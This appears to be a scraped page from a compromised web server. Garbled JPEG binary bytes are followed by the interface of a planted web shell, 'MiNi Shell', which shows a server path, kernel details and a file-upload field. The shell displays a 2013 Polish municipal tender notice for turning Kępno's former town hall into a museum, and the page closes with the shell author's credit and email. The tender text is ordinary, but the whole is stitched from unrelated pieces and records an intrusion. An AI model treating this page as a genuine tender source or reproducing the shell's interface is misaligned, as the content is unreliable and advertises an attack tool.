JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131010/210545-N-2013.html

<p class="kh_header"><b>Kępno: Remont i adaptacja budynku byłego magistratu w Kępnie na siedzibę Muzeum Ziemi Kępińskiej im. T. P. Potworowskiego</b><br>
<b>Numer ogłoszenia: 210545 - 2013; data zamieszczenia: 10.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kępno , ul. Ratuszowa 1, 63-600 Kępno, woj. wielkopolskie, tel. 62 78 25 800, faks 62 78 25 801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.kepno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i adaptacja budynku byłego magistratu w Kępnie na siedzibę Muzeum Ziemi Kępińskiej im. T. P. Potworowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont i adaptacja zabytkowego budynku byłego magistratu w Kępnie na potrzeby Muzeum Ziemi Kępińskiej im. T. P. Potworowskiego. 
W wyniku realizacji projektu zostanie przebudowany pochodzący z 1846r., zlokalizowany na  rynku miejskim w Kępnie zabytkowy neoklasyczny budynek byłego magistratu (łączna pow. 898,66m2), przy założeniu następujących kompleksowych rozwiązań funkcjonalno-przestrzennych:
1.PIWNICE, 207,26m2: w całości przeznaczone na wznowienie działalności Galerii Sztuki Współczesnej AE, Oddział Muzeum Ziemi Kępińskiej (Sala Wystawowa - 92,38m2, powierzchnia magazynowa 20,16m2, komunikacja, biuro 5,87m2, WC, pomieszczenia techniczne)
2.PARTER, 227,73m2: pomieszczenia wystawiennicze dla ekspozycji stałej (129,95 m2), szatnia, WC, pokoje administracji.
3.I PIĘTRO, 244,79m2: pomieszczenia wystawiennicze dla wystaw czasowych wraz z wyposażeniem audiowizualnym umożliwiającym prowadzenie ciekawych form przekazywania informacji z zakresu kultury, sztuki i historii 73,31m2, pomieszczenia magazynowa 12,23m2, pracownia archeologiczna, dział organizacji wystaw + pracownia, WC.
4.PODDASZE, 218,88m2: magazyny, biblioteka muzealna, pracownie konserwatorskie, fotograficzna, oraz pomieszczenia socjalne.
5.Kubatura budynku - 4600 m3            
DANE OGÓLNE PRZEDMIOTU ZAMÓWIENIA: 
Roboty budowlane architektoniczno - konstrukcyjne i wykończeniowe.
Roboty instalacji elektrycznych zewnętrznych, wewnętrznych i słaboprądowych.. 
Roboty instalacji wodnokanalizacyjnych, deszczowych, gazowych, wentylacyjnych,     klimatyzacyjnych, centralnego ogrzewania,
Inwestycja  dotyczy kompleksowej adaptacji na cele kulturalne zabytkowego obiektu byłego magistratu w Kępnie, wpisanego na listę Wojewódzkiego Konserwatora Zabytków pod numerem 222/Wlkp./A. Budynek, którego dotyczy projekt został wzniesiony w 1846 roku w stylu neoklasycznym, jako budowla ceglana dwukondygnacyjna przy ulicy Ratuszowej 2 w Kępnie. Budynek znajduje się na terenie objętym ścisłą ochroną konserwatorską na działce nr ewidencyjny 1382 o pow. 0,0391ha (KW 41860) . Przebudowę obiektu należy wykonać zgodnie z zaleceniami i wytycznymi Wojewódzkiego Konserwatora Zabytków.
Roboty budowlane prowadzić należy zgodnie z ustawą o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003 r.  oraz rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytkach wpisanych do rejestru zabytków oraz badań archeologicznych . 
Szczegółowy opis przedmiotu zamówienia oraz zakres zadania został określony w dokumentacji projektowej, przedmiarach robót i specyfikacjach technicznych, które stanowią załączniki do nin. SIWZ.
Zamówieniem objęte są również:
1.wykonanie wszelkich robót i czynności związanych z prawidłową realizacją zamówienia, nawet w przypadku, gdy nie zostały one ujęte przetargowym przedmiarze robót, jednakże zostały uwzględnione w dokumentacji projektowej
2.spełnienie zaleceń zgodnie z decyzją  Wojewódzkiego Urzędu Ochrony Zabytków w Poznaniu Delegatura w Kaliszu nr 310/2012 w sprawie prowadzenia prac konserwatorskich w zabytkowym budynku 
Wszystkie elementy stolarki okiennej i drzwiowej oraz elementy wykończeniowe wewnętrzne i zewnętrzne podlegają przed rozpoczęciem ich wykonania i montażu, zatwierdzeniu przez Wojewódzkiego Konserwatora Zabytków w Kaliszu
3.pełna obsługa geodezyjna budowy: wytyczenie, inwentaryzacja powykonawcza 
(4 egzemplarze), 
4.wszelkie naprawy urządzeń nad- i podziemnych uszkodzonych podczas wykonywania robót,
5.dopełnienie wszelkich zaleceń wynikających z wszystkich uzgodnień branżowych,
6.przeprowadzenie wszelkich robót i czynności związanych z odbiorem przedmiotu zamówienia i przekazaniem go do eksploatacji, itp. - niezbędne do uzyskania pozwolenia na użytkowanie (przygotowanie niezbędnej dokumentacji odbiorowej w czterech egzemplarzach)
7.zabezpieczenie bezpieczeństwa na placu budowy i wokół niego oraz ubezpieczenie budowy,
8   ponadto do obowiązków wykonawcy należy:
 -powołać osobę posiadająca uprawnienia do prowadzenia prac archeologicznych
 - powołać osobę posiadająca uprawnienia do prowadzenia prac przy zabytku wpisanym  do rejestru zabytków
UWAGA
REMONTOWANY OBIEKT ZNAJDUJE się NA ZMODERNIZOWANYM   RYNKU  MIASTA 
W związku z powyższym przy remontowanym obiekcie można wydzielić ze względu na wielkość terenu tylko częściowy plac budowy (mapa - załącznik nr 9) pod warunkiem zabezpieczenia przez Wykonawcę nawierzchni (kostka granitowa, płyty granitowe) przed jej uszkodzeniem lub zniszczeniem, ogrodzenie placu budowy - wysokość min 2 m, pełne, rodzaj ogrodzenia do akceptacji przez zamawiającego. Wykonawca swoim staraniem i na własny koszt może zorganizować główny plac budowy - przeładunkowy ze względu na problemy logistyczne związane z transportem na teren budowy .    
Z uwagi na istniejące ograniczenie tonażowe obowiązujące w obrębie Rynku oraz dróg dojazdowych do 3,5t. możliwości wjazdu na rynek do modernizowanego obiektu musi odbywać się pojazdami spełniającymi w/w warunki .
W przypadku zaistnienia konieczności wjazdu pojazdów powyżej wskazanego tonażu wykonawca zobowiązany jest uzyskać zgodę od Zarządcy Drogi .  
Wszelkie uszkodzenia dróg dojazdowych Wykonawca zobowiązany będzie odtworzyć do stanu pierwotnego na własny koszt.
Zamawiający zastrzega sobie prawo do ograniczenia czasu wykonywania prac zewnętrznych w czasie uroczystości odbywających się na terenie rynku po wcześniejszym 7 dniowym poinformowaniu Wykonawcy  przez Inwestora .
Wykonawca zobowiązany jest do przedstawiania Zamawiającemu przed wbudowaniem materiałów renowacyjnych niezbędnych atestów oraz uzyskania zatwierdzenia - zgody  na ich wbudowanie  
Bezwzględnie należy zapoznać się z dokumentacją techniczną (budowlaną) zadania.
Istnieje możliwość zapoznania się przez Wykonawcę z  budynkiem i terenem, na którym będą realizowane roboty stanowiące przedmiot niniejszego zamówienia oraz elementami uzbrojenia podziemnego i nadziemnego na terenie realizacji robót i jego sąsiedztwie. Wykonawca nie będzie mógł żądać dodatkowego wynagrodzenia z tytułu nieuwzględnienia okoliczności w/w, a okoliczności te nie będą mogły stanowić także wystarczającego powodu dla Wykonawcy, aby nie mógł rozpocząć robót w wyznaczonym terminie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.22.10-6, 45.26.26.20-6, 45.42.11.46-9, 45.26.10.00-4, 45.43.00.00-0, 45.42.10.00-4, 45.41.00.00-4, 45.44.30.00-4, 45.33.23.00-6, 45.33.11.00-7, 45.33.12.00-8, 45.33.30.00-0, 45.31.56.00-4, 45.31.73.00-5, 45.31.10.00-1, 45.31.61.00-6, 45.31.12.00-2, 45.31.51.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100 000,00 zł (sto tysięcy 00/100zł)
1. Wadium może być wniesione w następujących formach:
1/ pieniądzu, 
2/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3/ gwarancjach bankowych,
4/ gwarancjach ubezpieczeniowych,
5/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2  ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium w pieniądzu powinno być wpłacone przelewem na konto Zamawiającego w Banku Zachodnim WBK S.A. Oddział w Kępnie nr rachunku 65 1090 1144 0000 0000 1400 3711.
Wadium w innej formie niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Kępnie ul. Ratuszowa 1, 63-600 Kępno, dołączając do oferty potwierdzenie złożenia wadium.
2. Wadium wnosi się przed terminem składania ofert.
3. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, że wynika to 
z przyczyn nieleżących po jego stronie.
4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia Zamawiający, żąda by Wykonawca wykazał, iż wykonał w okresie ostatnich 5 lat, (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert co najmniej jedno zadanie odpowiadające swoim rodzajem robotom budowlanym stanowiących przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów, przez zadanie odpowiadające rodzajem robotom budowlanym stanowiącym przedmiot zamówienia należy rozumieć budynek podlegający  ścisłej ochronie konserwatorskiej wpisany do rejestru zabytków nieruchomych   o kubaturze minimalnej 3500 m3  w którym wykonano roboty budowlane polegające na przebudowie budynku  wraz wykonaniem instalacji sanitarnych i elektrycznych oraz  pełnym wykończeniem zewnętrznym i wewnętrznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia powyższy warunek, jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w tym osoby zdolnej do pełnienia funkcji kierownika (ów) budowy bez ograniczeń w specjalności:
konstrukcyjno-budowlanej wraz z uprawnieniami do kierowania robotami budowlanymi przy zabytkach nieruchomych w specjalności konstrukcyjno-budowlanej wydane przez Wojewódzkiego Konserwatora Zabytków,
sieci gazowych, 
sieci wodnokanalizacyjnych 
sieci elektrycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Przed podpisaniem umowy Wykonawca, którego oferta została uznana za najkorzystniejszą będzie zobowiązany:
1.przedłożyć umowę regulującą współpracę wykonawców wspólnie realizujących zamówienie (dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia),
2.przedłożyć Zamawiającemu (i uzyskać jego akceptację) Harmonogram rzeczowo-finansowy robót (w miesiącach) potwierdzający możliwość wykonania przedmiotu zamówienia w terminie, o którym mowa w pkt. 5 niniejszej Specyfikacji dla Wykonawców i określający zakres robót podlegający częściowej płatności, 
3.przedłożyć Zamawiającemu (i uzyskać jego akceptację)  opłaconą polisę od odpowiedzialności cywilnej na minimum 5.000 000,00 zł , a w przypadku jej braku inny dokument potwierdzający że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na czas realizacji robót objętych umową, tj. do dnia odbioru końcowego tych robót. 
4. dostarczyć kosztorys ofertowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z zastrzeżeniem postanowień ustępów 2 i 3 niniejszego paragrafu niedopuszczalne są istotne zmiany postanowień zawartej umowy w stosunku do oferty na podstawie której dokonano wyboru Wykonawcy.
2.Dopuszczalne są jednak za zgodą Zamawiającego istotne zmiany zawartej umowy, pod warunkiem, że dotyczą choćby jednej z kwestii określonych w ustępach 3 niniejszego paragrafu.
3.Zmiany, o których mowa w ust. 2, mogą dotyczyć:
1)podwyższenia jakości robót budowlanych,
2)aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny,
3)zmiany producenta urządzeń lub wyposażenia,
4)zmiany w kolejności i terminach wykonywania robót budowlanych oraz końcowego terminu wykonania umowy.
4.Warunkiem dokonania zmian, o których mowa w ust. 3, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego:
1)opis propozycji zmiany umowy,
2)uzasadnienie zmiany umowy,
3)opis wpływu zmiany na harmonogram robót i termin wykonania umowy.
5.Zmiany, o których mowa w ust. 3, mogą zostać dokonane, jeżeli za ich wprowadzeniem przemawia choćby jedna z niżej wymienionych okoliczności:
1)obniżenie kosztu wykonania robót lub kosztu eksploatacji (użytkowania) obiektu,
2)poprawa wartości lub podniesienia sprawności ukończonych robót budowlanych,
3)zmiana obowiązujących przepisów,
4)podniesienie wydajności urządzeń,
5)podniesienie bezpieczeństwa wykonywania robót,
6)usprawnienia w trakcie użytkowania obiektu,
7)opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez  Zamawiającego, lub innego wykonawcę zatrudnionego przez Zamawiającego na terenie budowy,
8)zaistnienie nieprzewidzianych warunków geologicznych, hydrogeologicznych, wykopalisk, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach,
9)siła wyższa.
6.Nie dopuszcza się przedłużenia terminu wykonania umowy w przypadku uchybień Wykonawcy w toku wykonywania prac, albo naruszeń umowy przez Wykonawcę. 
7. Dokonanie zmian, o których mowa w ust. 3, wymaga podpisania aneksu do umowy, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kepno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Kępnie ul. Ratuszowa 1 63-600 Kępno..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Kępnie ul. Ratuszowa 1, 63-600 Kępno - SEKRETARIAT..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Źródła finansowania zadania: środki własne budżetu Gminy Kępno oraz środki Europejskiego Funduszu Rozwoju Regionalnego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com